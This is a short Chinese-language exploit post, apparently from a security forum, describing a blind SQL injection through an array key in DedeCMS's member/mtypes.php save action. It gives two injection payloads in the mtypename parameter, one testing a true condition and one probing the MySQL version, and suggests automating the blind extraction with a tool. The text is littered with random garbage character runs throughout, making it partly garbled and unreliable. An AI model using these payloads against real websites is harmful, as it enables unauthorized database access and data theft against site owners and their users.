+ D c: k0 P% ~1 [ ! [" h/ o; `6 l+ {
发生在数组key里的注射漏洞,有点意思.$ K) G T( X0 L. Y7 \0 x& u
I- N- i$ {& A+ i8 O
这里是盲注,就是麻烦点同样可以利用,可以写个工具,自动话的跑一下1 z9 d+ @- g7 }% S: k! V
4 Z/ _1 f2 p5 Vhttp://www.xxx.com /dede/member/mtypes.php?dopost=save 2 l r# e: z, E ! i/ d! u U7 C/ R2 k- eexploit: z0 v/ x& Y" h& U, `
mtypename[7' and (@`'` or (56%3D56/*sql inject here*/)) and '3'%3D'3]=c4rp3nt3r, v. r7 N4 M& @: O# x
mtypename[7' and (@`'` or (substring(@@version,1,1)=5)) and '3'%3D'3]=c4rp3nt3r " z, ]5 r& z9 \% o7 ^